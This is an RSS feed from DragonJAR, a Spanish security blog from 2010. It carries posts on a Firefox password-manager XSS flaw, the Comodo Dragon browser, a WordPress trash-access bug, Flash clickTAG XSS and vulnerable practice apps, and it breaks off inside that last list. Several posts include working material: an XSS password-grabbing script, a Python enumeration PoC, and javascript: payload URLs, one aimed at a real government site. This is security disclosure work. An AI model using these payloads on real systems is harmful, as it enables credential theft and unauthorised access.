<?xml version="1.0" encoding="UTF-8"?>
<rss version="2.0"
	xmlns:content="http://purl.org/rss/1.0/modules/content/"
	xmlns:wfw="http://wellformedweb.org/CommentAPI/"
	xmlns:dc="http://purl.org/dc/elements/1.1/"
	xmlns:atom="http://www.w3.org/2005/Atom"
	xmlns:sy="http://purl.org/rss/1.0/modules/syndication/"
	xmlns:slash="http://purl.org/rss/1.0/modules/slash/"
	>

<channel>
	<title>La Comunidad DragonJAR &#187; Seguridad Web</title>
	<atom:link href="http://www.dragonjar.org/category/seguridad-web/feed" rel="self" type="application/rss+xml" />
	<link>http://www.dragonjar.org</link>
	<description>Noticias de actualidad y seguridad informática, herramientas de seguridad, documentación y una excelente COMUNIDAD.</description>
	<lastBuildDate>Wed, 17 Mar 2010 06:22:04 +0000</lastBuildDate>
	<generator>http://wordpress.org/?v=2.9.2</generator>
	<language>en</language>
	<sy:updatePeriod>hourly</sy:updatePeriod>
	<sy:updateFrequency>1</sy:updateFrequency>
			<item>
		<title>Robando claves por XSS del Administrador de Contraseñas del Firefox</title>
		<link>http://www.dragonjar.org/robando-claves-por-xss-del-administrador-de-contrasenas-del-firefox.xhtml</link>
		<comments>http://www.dragonjar.org/robando-claves-por-xss-del-administrador-de-contrasenas-del-firefox.xhtml#comments</comments>
		<pubDate>Tue, 16 Mar 2010 06:51:50 +0000</pubDate>
		<dc:creator>DragoN</dc:creator>
				<category><![CDATA[Seguridad Web]]></category>
		<category><![CDATA[Administrador]]></category>
		<category><![CDATA[Clave]]></category>
		<category><![CDATA[Contrasena]]></category>
		<category><![CDATA[Contraseñas]]></category>
		<category><![CDATA[Inyección]]></category>
		<category><![CDATA[Mozilla Firefox]]></category>
		<category><![CDATA[NoScript]]></category>
		<category><![CDATA[Password]]></category>
		<category><![CDATA[Passwords]]></category>
		<category><![CDATA[Robar]]></category>
		<category><![CDATA[Robo]]></category>
		<category><![CDATA[XSS]]></category>

		<guid isPermaLink="false">http://www.dragonjar.org/?p=4045</guid>
		<description><![CDATA[Gracias a un mensaje de Tom Brennan, me entero de un problema en el Administrador de Contraseñas del Mozilla Firefox, que permite a un atacante mediante XSS (Cross-site scripting) obtener la clave de un usuario almacenada en el navegador.

El problema se encuentra en que el administrador de contraseñas del Mozilla Firefox , no valida adecuadamente [...]]]></description>
			<content:encoded><![CDATA[<p>Gracias a un mensaje de <a rel="nofollow" target="_blank" href="http://twitter.com/brennantom/status/10554441500">Tom Brennan</a>, me entero de un problema en el Administrador de Contraseñas del Mozilla Firefox, que permite a un atacante mediante XSS (<a rel="nofollow" target="_blank" href="http://es.wikipedia.org/wiki/Cross-site_scripting">Cross-site scripting</a>) obtener la clave de un usuario almacenada en el navegador.</p>
<p style="text-align: center;"><img class="alignnone" title="XSS Robo de claves" src="http://farm5.static.flickr.com/4069/4436827535_c045e2fae3.jpg" alt="4436827535 c045e2fae3 Robando claves por XSS del Administrador de Contraseñas del Firefox" width="500" height="325" /></p>
<p>El problema se encuentra en que el administrador de contraseñas del Mozilla Firefox , no valida adecuadamente el formulario desde el cual se guarda la clave en el administrador de contraseñas, por lo tanto si a la pagina donde se encuentra el formulario de logueo se le puede realizar un XSS es posible agregar un formulario con un campo oculto del tipo &#8220;password&#8221; y al acceder a ella, firefox no solo llenara el formulario real de acceso automáticamente, sino también el formulario oculto que acabamos de inyectar.<span id="more-4045"></span></p>
<p style="text-align: center;"><img class="alignnone" title="Robar contraseñas firefox" src="http://farm5.static.flickr.com/4049/4436827733_71f2f3e6d4.jpg" alt="4436827733 71f2f3e6d4 Robando claves por XSS del Administrador de Contraseñas del Firefox" width="498" height="111" /></p>
<p>Si le echamos un vistoso al formulario utilizando el plugin <a rel="nofollow" target="_blank" href="http://chrispederick.com/work/web-developer/">Web Developer</a> para el Mozilla Firefox, encontramos que efectivamente el Administrador de Contraseñas, nos llenó el formulario oculto que colocamos en la pagina mediante XSS con nuestra clave de acceso:</p>
<p style="text-align: center;"><img class="alignnone" title="Robar contraseñas" src="http://farm3.static.flickr.com/2736/4437603194_2c7c33f317_o.jpg" alt="4437603194 2c7c33f317 o Robando claves por XSS del Administrador de Contraseñas del Firefox" width="500" height="351" /></p>
<p>El código utilizado para robar la información del Administrador de contraseñas en el Mozilla Firefox:</p>
<blockquote><p><code>&lt;script&gt; document.write('&lt;form&gt;&lt;input id=p type=password style=visibility:hidden&gt;&lt;/form&gt;'); setTimeout('alert("Password: " + document.getElementById("p").value)', 100); &lt;/script&gt;</code></p></blockquote>
<p>Podemos modificar el formulario para que nos envié la contraseña capturada a un archivo en el que puede ser almacenada o enviada por correo electrónico, pero en esta prueba de concepto no lo realizaremos.</p>
<p>En este caso contar con &#8220;clave maestra&#8221; en el administrador de contraseñas del Mozilla Firefox no supone una &#8220;barrera&#8221; para que obtengan nuestras claves, ya que una vez ingresada la clave maestra, el Firefox llenara de todas formas el formulario con nuestra clave.</p>
<p>Aunque posiblemente una técnica similar pueda funcionar en otros navegadores, he realizado pruebas en Google Chrome, Safari y Opera siendo el Mozilla Firefox el único afectado.</p>
<p><strong>Actualización:</strong><br />
Un fallo similar fue <a rel="nofollow" target="_blank" href="https://bugzilla.mozilla.org/show_bug.cgi?id=359675">reportado en el 2006 y supuestamente fue resuelto &#8220;VERIFIED FIXED&#8221;,</a> pero acabo de probar con <a rel="nofollow" target="_blank" href="http://www.oftedal.no/~erlend/test/">la prueba de concepto que publicaron en esa ocasión</a> y sigue siendo vulnerable.</p>
<h2>Recomendaciones:</h2>
<ul>
<li>Escribe &#8220;about:config&#8221; en la barra del Firefox para desactivar (poner en &#8220;false&#8221;) la función signon.autofillForms</li>
<p><img class="alignnone" title="Deshabilitar auto llenado firefox" src="http://farm3.static.flickr.com/2721/4440250942_f1df42de73.jpg" alt="4440250942 f1df42de73 Robando claves por XSS del Administrador de Contraseñas del Firefox" width="500" height="130" /></p>
<p>Con esto deshabilitas la función de auto llenado del administrador de contraseñas y evitarnos ser victimas de este fallo.</p>
<li>Utilizar el plugin <a rel="nofollow" target="_blank" title="Enlace permanente a NoScript" rel="bookmark" href="../noscript.xhtml">NoScript</a> (si no hay inyección de código, no hay problema)</li>
<li>No utilizar el Administrador de Contraseñas de Mozilla Firefox (<a rel="nofollow" target="_blank" href="http://www.dragonjar.org/recupera-contrasenas-almacenadas-en-tu-navegador.xhtml">ya hemos demostrado que no es recomendable, ni en firefox, ni en ningún navegador</a>), en vez de el <a href="http://lastpass.com/">utilizar servicios gratuitos como LastPass</a> (al que por cierto le debo un articulo entero)</li>
</ul>
<p><strong>Mas Información:</strong><br />
<a rel="nofollow" target="_blank" href="http://ha.ckers.org/weird/xss-password-manager.html">XSS demo for stealing passwords from the Firefox password manager</a></p>
<h3  class="related_post_title">También puede interesarte...</h3><ul class="related_post"><li><a href="http://www.dragonjar.org/como-recuperar-una-cuenta-de-facebook.xhtml" title="¿Cómo Recuperar una Cuenta de Facebook?">¿Cómo Recuperar una Cuenta de Facebook?</a></li><li><a href="http://www.dragonjar.org/resetear-password-de-root.xhtml" title="Resetear Password de Root">Resetear Password de Root</a></li><li><a href="http://www.dragonjar.org/como-recuperar-clave-mysql.xhtml" title="Como Recuperar Clave MySQL">Como Recuperar Clave MySQL</a></li><li><a href="http://www.dragonjar.org/diccionarios-para-realizar-ataques-de-fuerza-bruta.xhtml" title="Listado de Diccionarios para Realizar Ataques de Fuerza Bruta">Listado de Diccionarios para Realizar Ataques de Fuerza Bruta</a></li><li><a href="http://www.dragonjar.org/1234-y-password-son-las-contrasenas-utilizadas-en-usa.xhtml" title="&#8220;1234&#8243; y &#8220;password&#8221; son las Contraseñas + Utilizadas en USA">&#8220;1234&#8243; y &#8220;password&#8221; son las Contraseñas + Utilizadas en USA</a></li><li><a href="http://www.dragonjar.org/malas-contrasenas-para-utilizar.xhtml" title="Las Peores 500 Contraseñas de Todos los Tiempos">Las Peores 500 Contraseñas de Todos los Tiempos</a></li><li><a href="http://www.dragonjar.org/passpub-generador-de-contrasenas-seguras.xhtml" title="PassPub, Generador de Contraseñas Seguras ">PassPub, Generador de Contraseñas Seguras </a></li><li><a href="http://www.dragonjar.org/maneja-tus-contrasenas-de-forma-sencilla.xhtml" title="Maneja tus Contraseñas de Forma Sencilla ">Maneja tus Contraseñas de Forma Sencilla </a></li></ul>]]></content:encoded>
			<wfw:commentRss>http://www.dragonjar.org/robando-claves-por-xss-del-administrador-de-contrasenas-del-firefox.xhtml/feed</wfw:commentRss>
		<slash:comments>3</slash:comments>
		</item>
		<item>
		<title>&#8220;Crean&#8221; un navegador pensando en su seguridad</title>
		<link>http://www.dragonjar.org/el-navegador-mas-seguro.xhtml</link>
		<comments>http://www.dragonjar.org/el-navegador-mas-seguro.xhtml#comments</comments>
		<pubDate>Thu, 18 Feb 2010 18:13:56 +0000</pubDate>
		<dc:creator>DragoN</dc:creator>
				<category><![CDATA[Seguridad Web]]></category>
		<category><![CDATA[Chromium]]></category>
		<category><![CDATA[Google Chrome]]></category>
		<category><![CDATA[Internet]]></category>
		<category><![CDATA[Navegador]]></category>
		<category><![CDATA[Privacidad]]></category>
		<category><![CDATA[Seguro]]></category>
		<category><![CDATA[SSL]]></category>
		<category><![CDATA[Web Browser]]></category>
		<category><![CDATA[Windows]]></category>
		<category><![CDATA[WINE]]></category>

		<guid isPermaLink="false">http://www.dragonjar.org/?p=3885</guid>
		<description><![CDATA[La empresa de seguridad Comodo, famosa por su Antivirus y Firewall, ha creado un navegador llamado Comodo Dragon,  pensando totalmente en la seguridad del usuario.

Comodo Dragon esta basado en el navegador Chromium (igual que Google Chrome), pero ademas de las características que ya incluye Chromiun el nuevo navegador seguro de Comodo incluye las siguientes:

Privacidad de [...]]]></description>
			<content:encoded><![CDATA[<p>La empresa de seguridad Comodo, famosa por su Antivirus y Firewall, ha creado un navegador llamado Comodo Dragon,  pensando totalmente en la seguridad del usuario.</p>
<p style="text-align: center;"><img class="alignnone" title="Navegador Seguro" src="http://img690.imageshack.us/img690/5836/comododragon.png" alt="comododragon Crean un navegador pensando en su seguridad" width="500" height="321" /></p>
<p>Comodo Dragon esta basado en el <a rel="nofollow" target="_blank" href="http://code.google.com/intl/es-ES/chromium/">navegador Chromium</a> (igual que Google Chrome), pero ademas de las características que ya incluye Chromiun el nuevo navegador seguro de Comodo incluye las siguientes:<span id="more-3885"></span></p>
<ul>
<li>Privacidad de Chromium Mejorada</li>
<li>Fácil  identificación del certificado SSL</li>
<li>Acceso a sitios web más rápido</li>
<li>Mayor estabilidad y menos consumo de memoria</li>
<li>Modo Incognito (también conocido como &#8220;modo porno&#8221;) detiene las Cookies, Mejora de privacidad</li>
<li>Si usas Cromium o Google Chrome es Muy fácil de cambiar de su navegador a Comodo Dragón</li>
</ul>
<p>De momento Comodo Dragon esta disponible para Windows XP/Vista/7/Server, pero funciona adecuadamente con Wine en Mac (aun no probado en GNU Linux).</p>
<h2 style="text-align: center;"><a rel="nofollow" target="_blank" href="http://www.comodo.com/home/internet-security/browser.php">Descargar Comodo Dragon, el navegador pensado en tu seguridad.</a></h2>
<h3  class="related_post_title">También puede interesarte...</h3><ul class="related_post"><li><a href="http://www.dragonjar.org/descargar-gratis-internet-explorer-8-final.xhtml" title="Descargar Gratis Internet Explorer 8 Final">Descargar Gratis Internet Explorer 8 Final</a></li><li><a href="http://www.dragonjar.org/fallo-en-openssl-permite-obtener-clave-privada.xhtml" title="Fallo en OpenSSL permite obtener clave privada">Fallo en OpenSSL permite obtener clave privada</a></li><li><a href="http://www.dragonjar.org/descargar-instalar-google-chrome-os.xhtml" title="Descargar e Instalar Google Chrome OS">Descargar e Instalar Google Chrome OS</a></li><li><a href="http://www.dragonjar.org/google-chrome-para-gnu-linux-y-mac-os-x.xhtml" title="Google Chrome para GNU Linux y Mac OS X">Google Chrome para GNU Linux y Mac OS X</a></li><li><a href="http://www.dragonjar.org/forzando-conexiones-ssl-por-defecto.xhtml" title="Forzando Conexiones SSL por defecto">Forzando Conexiones SSL por defecto</a></li><li><a href="http://www.dragonjar.org/actualiza-tu-equipo-con-windows.xhtml" title="Actualiza tu equipo con Windows">Actualiza tu equipo con Windows</a></li><li><a href="http://www.dragonjar.org/sin-ssl-y-ahora-quien-podra-defendernos.xhtml" title="Sin SSL ¿Y Ahora Quien Podrá Defendernos?">Sin SSL ¿Y Ahora Quien Podrá Defendernos?</a></li><li><a href="http://www.dragonjar.org/linux-unified-kernel-soporte-para-gnu-linux-y-windows-desde-el-kernel.xhtml" title="Linux Unified Kernel &#8211; Soporte para GNU Linux y Windows desde el mismo Kernel">Linux Unified Kernel &#8211; Soporte para GNU Linux y Windows desde el mismo Kernel</a></li></ul>]]></content:encoded>
			<wfw:commentRss>http://www.dragonjar.org/el-navegador-mas-seguro.xhtml/feed</wfw:commentRss>
		<slash:comments>8</slash:comments>
		</item>
		<item>
		<title>Pueden leer tu &#8220;Basura&#8221;</title>
		<link>http://www.dragonjar.org/pueden-leer-tu-basura.xhtml</link>
		<comments>http://www.dragonjar.org/pueden-leer-tu-basura.xhtml#comments</comments>
		<pubDate>Mon, 15 Feb 2010 07:33:25 +0000</pubDate>
		<dc:creator>DragoN</dc:creator>
				<category><![CDATA[Seguridad Web]]></category>
		<category><![CDATA[Informacion]]></category>
		<category><![CDATA[Seguridad]]></category>
		<category><![CDATA[WordPress]]></category>

		<guid isPermaLink="false">http://www.dragonjar.org/?p=3856</guid>
		<description><![CDATA[Un nuevo fallo en el famoso WordPress, descubierto por el investigador Thomas Mackenzie permitiría a &#8220;cualquier&#8221; persona los artículos, comentarios y paginas, que hayas borrado y se encuentren en la &#8220;papelera&#8221;.

Desde la versión 2.9 de WordPress se implementó una nueva característica  llamada &#8220;papelera&#8220;, con la cual todos los artículos, comentarios o páginas &#8220;borradas&#8221; pasarían a [...]]]></description>
			<content:encoded><![CDATA[<p style="text-align: justify;">Un nuevo fallo en el famoso WordPress, descubierto por el investigador <a rel="nofollow" target="_blank" href="http://tmacuk.co.uk/?p=180">Thomas Mackenzie</a> permitiría a &#8220;cualquier&#8221; persona los artículos, comentarios y paginas, que hayas borrado y se encuentren en la &#8220;papelera&#8221;.</p>
<p style="text-align: center;"><img class="alignnone" title="Fallo en WordPress" src="http://img59.imageshack.us/img59/5996/wordpresstrash300x300.png" alt="wordpresstrash300x300 Pueden leer tu Basura" width="300" height="300" /></p>
<p style="text-align: justify;">Desde la versión 2.9 de WordPress se implementó una nueva característica  llamada &#8220;<a rel="nofollow" target="_blank" href="http://www.youtube.com/watch?v=dFlBm2XGv4g">papelera</a>&#8220;, con la cual todos los artículos, comentarios o páginas &#8220;borradas&#8221; pasarían a la &#8220;papelera de reciclaje&#8221; para prevenir así que sean eliminados de forma accidental.</p>
<p style="text-align: justify;">Lo que descubrió <a rel="nofollow" target="_blank" href="http://tmacuk.co.uk/?p=180">Thomas Mackenzie</a> es que en WordPress decidieron no ponerle restricción de acceso a los contenidos de la &#8220;papelera&#8221;, por lo que cualquier persona con privilegio 0 (Suscriptor) podría ver todo lo que estuviera almacenado en ella, el único inconveniente (y posiblemente la razón por la que dejaron este nivel de acceso), es que necesitamos conocer la ruta de los contenidos eliminados para poder acceder a ellos&#8230; cosa que <a rel="nofollow" target="_blank" href="http://tmacuk.co.uk/?p=180">Mackenzie</a> pudo solucionar desarrollando este script en Python, con el que enumera los contenidos que tenemos en nuestra &#8220;papelera&#8221;.<span id="more-3856"></span></p>
<blockquote><p>#/usr/bin/python<br />
#<br />
# WordPress &gt; 2.9 Failure to Restrict URL Access PoC<br />
#<br />
# This script iterates through the WP post ID&#8217;s as an authenticated and unauthenticated user.<br />
# If the requests differ a &#8216;Trash&#8217; post has been found.<br />
#<br />
# You will need an authenticated user cookie of any priveledge to run this script.<br />
#<br />
# Example cookie:<br />
# wordpress_logged_in_62b3ab14f277d92d3d313662ea0c84e3=test%7C1266245173%7C990157a59700a69edbf133aa22fca1f8<br />
#<br />
# Will only work with WP URLs with the &#8216;/?p={int}&#8217; parameter. Would need to handle redirects (3xx) to handle all URL types.<br />
#<br />
#<br />
# Research/PoC/Advisory By: Tom Mackenzie (tmacuk) and Ryan Dewhurst (ethicalhack3r)</p>
<p>import httplib</p>
<p># Declare vars<br />
blogURL = &#8220;www.example.com&#8221;<br />
userCookie = &#8220;enter_cookie_here&#8221;<br />
postID = 0 #Leave at 0</p>
<p>conn = httplib.HTTPConnection(blogURL)<br />
Headers = {&#8220;Cookie&#8221; : userCookie}</p>
<p>print<br />
print &#8220;Target = http://&#8221; + blogURL + &#8220;/?p=&#8221; + str(postID)<br />
print</p>
<p>while 1:</p>
<p># Start non authenticated enumeration</p>
<p>request = &#8216;/?p=&#8217; + str(postID)<br />
conn.request(&#8220;GET&#8221;, request, &#8220;&#8221;)</p>
<p>try:<br />
r1 = conn.getresponse()<br />
except:<br />
print &#8220;Connection error&#8221;</p>
<p>data1 = r1.read()</p>
<p># Start authenticated enumeration</p>
<p>conn.request(&#8220;GET&#8221;, request, None, Headers)</p>
<p>try:<br />
r2 = conn.getresponse()<br />
except:<br />
print &#8220;Connection error&#8221;</p>
<p>data2 = r2.read()</p>
<p># Compare the HTML body reponses</p>
<p>if data1 != data2:<br />
print &#8220;+ Found! http://&#8221; + blogURL + request<br />
else:<br />
print request</p>
<p>postID += 1</p>
<p>conn.close()</p></blockquote>
<p style="text-align: justify;">Como pueden ver, en esta prueba de concepto, es necesario contar con una cookie de un usuario logueado en el sistema, cosa que no es difícil si el blog tiene el registro de usuarios activo (practica poco recomendada) o se puede conseguir mediante ingeniería social, por lo tanto es mas que recomendable que <a rel="nofollow" target="_blank" href="http://wordpress.org/download/">actualicen su instalación de WordPress a la versión 2.9.2</a> que ya cuenta con un parche para este problema de seguridad.</p>
<p style="text-align: justify;">Una vez más queda confirmado que la seguridad por &#8220;oscuridad&#8221;  no es una buena práctica y siempre debe estar acompañada con otras medias que garanticen la confidencialidad, integridad y disponibilidad de nuestra información.</p>
<p style="text-align: justify;"><strong>PD.</strong> Lo que no entiendo es por que páginas como <a rel="nofollow" target="_blank" href="http://www.daboweb.com/2010/02/16/wordpress-2-9-2-disponible/">DaboWeb</a> y <a rel="nofollow" target="_blank" href="http://mangasverdes.es/2010/02/15/wordpress-2-9-2-nueva-actualizacion-urgente/">Mangas Verdes</a> hablan de este fallo y afirman que un posible atacante puede &#8220;Eliminar artículos de nuestro WordPress&#8221; ¿De donde habrán sacado esa informacion?&#8230;</p>
<h3  class="related_post_title">También puede interesarte...</h3><ul class="related_post"><li><a href="http://www.dragonjar.org/como-realizar-un-borrado-seguro-usando-bleachbit.xhtml" title="Como realizar un borrado seguro usando BleachBit">Como realizar un borrado seguro usando BleachBit</a></li><li><a href="http://www.dragonjar.org/realizaron-hardening-wordpress-descarga-la-nueva-versin-285.xhtml" title="Realizaron Hardening a WordPress, Descarga la nueva versión 2.8.5">Realizaron Hardening a WordPress, Descarga la nueva versión 2.8.5</a></li><li><a href="http://www.dragonjar.org/dos-en-wordpress.xhtml" title="Denegacion de Servicio en WordPress">Denegacion de Servicio en WordPress</a></li><li><a href="http://www.dragonjar.org/problemas-de-seguridad-en-wordpress-2-8-2-actualiza-a-wordpress-2-8-3.xhtml" title="Problemas de Seguridad en WordPress 2.8.2, Actualiza a WordPress 2.8.3">Problemas de Seguridad en WordPress 2.8.2, Actualiza a WordPress 2.8.3</a></li><li><a href="http://www.dragonjar.org/wordpress-263-vulnerable-a-xss.xhtml" title="WordPress 2.6.3 vulnerable a Cross Site Scripting">WordPress 2.6.3 vulnerable a Cross Site Scripting</a></li><li><a href="http://www.dragonjar.org/memorias-del-disi-2009.xhtml" title="Memorias del DISI 2009">Memorias del DISI 2009</a></li><li><a href="http://www.dragonjar.org/el-atacante-informatico-capitulo-2.xhtml" title="El Atacante Informático – Capítulo 2">El Atacante Informático – Capítulo 2</a></li><li><a href="http://www.dragonjar.org/boletin-de-la-comunidad-dragonjar-0008.xhtml" title="Boletín de La Comunidad DragonJAR #0008">Boletín de La Comunidad DragonJAR #0008</a></li></ul>]]></content:encoded>
			<wfw:commentRss>http://www.dragonjar.org/pueden-leer-tu-basura.xhtml/feed</wfw:commentRss>
		<slash:comments>12</slash:comments>
		</item>
		<item>
		<title>Vulnerabilidad de XSS en mas de 8 Millones de Sitios con Flash</title>
		<link>http://www.dragonjar.org/vulnerabilidad-xss-8-millones-aplicaciones-flash.xhtml</link>
		<comments>http://www.dragonjar.org/vulnerabilidad-xss-8-millones-aplicaciones-flash.xhtml#comments</comments>
		<pubDate>Sun, 17 Jan 2010 18:22:58 +0000</pubDate>
		<dc:creator>Axiacamus</dc:creator>
				<category><![CDATA[Artículos sobre seguridad]]></category>
		<category><![CDATA[Seguridad Web]]></category>
		<category><![CDATA[Adobe]]></category>
		<category><![CDATA[Anuncios]]></category>
		<category><![CDATA[Flash]]></category>
		<category><![CDATA[HTML]]></category>
		<category><![CDATA[JavaScript]]></category>
		<category><![CDATA[Macromedia]]></category>
		<category><![CDATA[SWF]]></category>
		<category><![CDATA[Vulnerabilidad]]></category>
		<category><![CDATA[Web]]></category>
		<category><![CDATA[XSS]]></category>

		<guid isPermaLink="false">http://www.dragonjar.org/?p=3644</guid>
		<description><![CDATA[Una de las aplicaciones mas comunes utilizadas en los sitios web,  son las películas y clics hechos en Adobe Flash (antes de Macromedia),  animaciones, slideshows  y anuncios publicitarios en este formato, están a la orden del día por toda la red. La facilidad con la que se crean y la gran cantidad de documentación sobre [...]]]></description>
			<content:encoded><![CDATA[<p>Una de las aplicaciones mas comunes utilizadas en los sitios web,  son las películas y clics hechos en Adobe Flash (<a rel="nofollow" target="_blank" href="http://www.adobe.com/aboutadobe/invrelations/adobeandmacromedia.html">antes de Macromedia</a>),  animaciones, slideshows  y anuncios publicitarios en este formato, están a la orden del día por toda la red. La facilidad con la que se crean y la gran cantidad de documentación sobre el uso de Flash, a colaborado para que su uso se extienda a millones de sitios web.</p>
<p style="text-align: center;"><img class="alignnone" title="Vulnerabilidad den Adobe Flash" src="http://farm3.static.flickr.com/2516/4281994965_8481cfbf7f_o.jpg" alt="4281994965 8481cfbf7f o Vulnerabilidad de XSS en mas de 8 Millones de Sitios con Flash" width="290" height="200" /></p>
<p>A pesar de ser una herramienta muy útil,  personalmente pienso que esta sobreutilizada y que tiene gran cantidad de defectos, como no poder ser indexados adecuadamente en los buscadores,  la cantidad de recursos que consume cuando se utiliza para visualizar película s o vídeos online,  a esta lista de desventajas, ahora hay que sumarle un nuevo fallo de seguridad, descubierto por el investigador MustLive y publicado en su sitio <a rel="nofollow" target="_blank" href="http://websecurity.com.ua/3789/">websecurity.com.ua</a>.<span id="more-3644"></span></p>
<p>El fallo consiste en una vulnerabilidad de XSS (<em>Cross-site scripting</em>) la cual permite incrustar codigo Javascript y/o HTML, en algunas animaciones flash que no validan correctamente sus parámetros de entrada.</p>
<p><strong>Ejemplo del código vulnerable:</strong></p>
<p>Como se puede ver,  en el siguiente código actionscript, no se hace validación alguna a las variables obtenidas:</p>
<blockquote><p><code>getURL(_root.clickTAG, "_blank");</code></p></blockquote>
<p>El codigo anterio podria ser explotado de la siguiente forma:</p>
<blockquote><p><code>http://sitiovulnreable/flash.swf?clickTAG=javascript:alert('comunidad dragonjar')</code></p></blockquote>
<p>Pero no es la única variable vulnerable a este tipo de vulnerabilidades XSS</p>
<blockquote><p><code>getURL(_root.url, "_blank");</code></p></blockquote>
<p>Que puede ser explotada de la siguiente forma:</p>
<blockquote><p><code>http://sitiovulnreable/flash.swf?url=javascript:alert('comunidad dragonjar')</code></p></blockquote>
<p>Para ver el funcionamiento de este tipo de ataques, les dejo <a rel="nofollow" target="_blank" href="http://www.metropol.gov.co/aire/compartidos/imagenes/intro_simeca.swf?url=javascript:alert(%22Comuidad%20DragonJAR%22)//">este flash en el portal del &#8220;Area Metropolitana del Valle de Aburrá&#8221;</a>, donde podemos ver que con solo deja correr la animacion , nos ejecutara el alert en javascript que hemos incrustado de forma arbitraria en el archivo flash, por lo que podríamos realizar todo tipo de estafas y engaños utilizando el nombre de esta pagina del gobierno colombiano.</p>
<p>Este problema que afecta millones de sitios en la red (lo cual podemos comprobar con una simple búsqueda en google  &#8221;filetype:swf  inurl:clicktag&#8221;), es aun mas grave si se tiene en cuenta que la mayoría de las personas que manejan Flash y en especial su lenguaje de programación ActionScript, son diseñadores o programadores que no tienen en cuenta la seguridad a la hora de realizar sus trabajos, una muestra de esto lo podemos <a rel="nofollow" target="_blank" href="http://www.elheraldo.com.co/ELHERALDO/html/publicidadweb/index.html">ver en el periódico &#8221;El Heraldo&#8221; de Barranquilla que recomienda el uso de un código vulnerable</a> para realizar la publicidad que se publica en su portal.</p>
<p><strong>Mas Información:</strong><br />
<a rel="nofollow" target="_blank" title="Permanent Link: XSS vulnerabilities in 8 millions flash files" rel="bookmark" href="http://websecurity.com.ua/3789/">XSS vulnerabilities in 8 millions flash files</a><br />
<a rel="nofollow" target="_blank" href="http://www.theregister.co.uk/2009/12/22/mass_flash_file_vulnerability/" target="_blank">Serious web vuln found in 8 million Flash files XSS</a></p>
<h3  class="related_post_title">También puede interesarte...</h3><ul class="related_post"><li><a href="http://www.dragonjar.org/multiples-vulnerabilidades-smf.xhtml" title="Multiples Vulnerabilidades en SMF">Multiples Vulnerabilidades en SMF</a></li><li><a href="http://www.dragonjar.org/cursos-gratis-de-diseno-web-en-el-sena-virtual.xhtml" title="Cursos Gratis de Diseño Web en el Sena Virtual">Cursos Gratis de Diseño Web en el Sena Virtual</a></li><li><a href="http://www.dragonjar.org/xss-que-permite-postear-en-wordpress.xhtml" title="XSS que permite postear a atacante registrado en WordPress">XSS que permite postear a atacante registrado en WordPress</a></li><li><a href="http://www.dragonjar.org/criterios-para-la-evaluacion-de-los-escaners-de-seguridad-web.xhtml" title="Criterios para la Evaluación de los Escaners de Seguridad Web">Criterios para la Evaluación de los Escaners de Seguridad Web</a></li><li><a href="http://www.dragonjar.org/xss-en-wordpress-2-8-1-actualiza-a-wordpress-2-8-2.xhtml" title="XSS en WordPress 2.8.1, Actualiza a WordPress 2.8.2">XSS en WordPress 2.8.1, Actualiza a WordPress 2.8.2</a></li><li><a href="http://www.dragonjar.org/descargar-gratis-internet-explorer-8-final.xhtml" title="Descargar Gratis Internet Explorer 8 Final">Descargar Gratis Internet Explorer 8 Final</a></li><li><a href="http://www.dragonjar.org/wordpress-263-vulnerable-a-xss.xhtml" title="WordPress 2.6.3 vulnerable a Cross Site Scripting">WordPress 2.6.3 vulnerable a Cross Site Scripting</a></li><li><a href="http://www.dragonjar.org/los-blogs-alojados-en-wordpresscom-vulnerables.xhtml" title="Los Blogs alojados en WordPress.com Vulnerables ">Los Blogs alojados en WordPress.com Vulnerables </a></li></ul>]]></content:encoded>
			<wfw:commentRss>http://www.dragonjar.org/vulnerabilidad-xss-8-millones-aplicaciones-flash.xhtml/feed</wfw:commentRss>
		<slash:comments>5</slash:comments>
		</item>
		<item>
		<title>Aplicaciones Web Vulnerables</title>
		<link>http://www.dragonjar.org/aplicaciones-web-vulnerables.xhtml</link>
		<comments>http://www.dragonjar.org/aplicaciones-web-vulnerables.xhtml#comments</comments>
		<pubDate>Sat, 16 Jan 2010 08:43:49 +0000</pubDate>
		<dc:creator>DragoN</dc:creator>
				<category><![CDATA[Seguridad Web]]></category>
		<category><![CDATA[aplicaciones]]></category>
		<category><![CDATA[Web]]></category>

		<guid isPermaLink="false">http://www.dragonjar.org/?p=3653</guid>
		<description><![CDATA[La practica hace el maestro, pero en el campo de la seguridad informática, si practicamos en aplicaciones o servidores de terceros, podemos llegar a tener problemas con la ley; Por este motivo existen herramientas como Damn Vulnerable Web App, una aplicacion web vulnerable que permite poner a prueba nuestros conocimientos sobre seguridad web, pero DVWA [...]]]></description>
			<content:encoded><![CDATA[<p>La practica hace el maestro, pero en el campo de la seguridad informática, si practicamos en aplicaciones o servidores de terceros, podemos llegar a tener problemas con la ley; Por este motivo existen herramientas como <strong><a rel="nofollow" target="_blank" title="Permanent Link to Damn Vulnerable Web App" rel="bookmark" href="../damn-vulnerable-web-app.xhtml">Damn Vulnerable Web App</a></strong>, una aplicacion web vulnerable que permite poner a prueba nuestros conocimientos sobre seguridad web, pero DVWA no es la única aplicacion de este tipo que existe, a continuación les dejo un listado con algunas de las aplicaciones web vulnerables:<span id="more-3653"></span></p>
<ul>
<li><strong><a rel="nofollow" target="_blank" href="http://www.owasp.org/index.php/Category:OWASP_WebGoat_Project">WebGoat</a></strong> es una aplicación web J2EE deliberadamente insegura, mantenida por OWASP y diseñada para enseñar lecciones de seguridad en aplicaciones Web. puedes <a rel="nofollow" target="_blank" href="http://labs.dragonjar.org/labs-owasp-webgoat-plataforma-de-pruebas-de-seguridad-web-instalacion-en-windows">aprender mas sobre esta herramienta en nuestro laboratorio</a>.</li>
</ul>
<ul>
<li><strong><a rel="nofollow" target="_blank" href="http://www.bonsai-sec.com/en/research/moth.php">Moth</a></strong> es una imagen de VMware que contiene un conjunto de aplicaciones Web y scripts vulnerables, que puedes utilizar para probar scanners de <a rel="nofollow" target="_blank" title="seguridad" href="../">seguridad</a> en aplicaciones Web, herramientas de análisis de código estático (SCA), dar cursos introductorios de seguridad en aplicaciones Web. puedes encontrar<a href="http://www.dragonjar.org/moth-entorno-virtualizado-para-entrenamiento-en-seguridad-con-aplicaciones-web-vulnerables.xhtml"> mas informacion sobre esta herramienta en nuestra comunidad</a>.</li>
</ul>
<ul>
<li><strong><a rel="nofollow" target="_blank" href="http://www.badstore.net/">BadStore</a></strong> es una aplicacion web para tienda virtual, que incluye de manera intencionada diferentes fallos de seguridad informática, para probar nuestros conocimientos y herramientas sobre ella.</li>
</ul>
<ul>
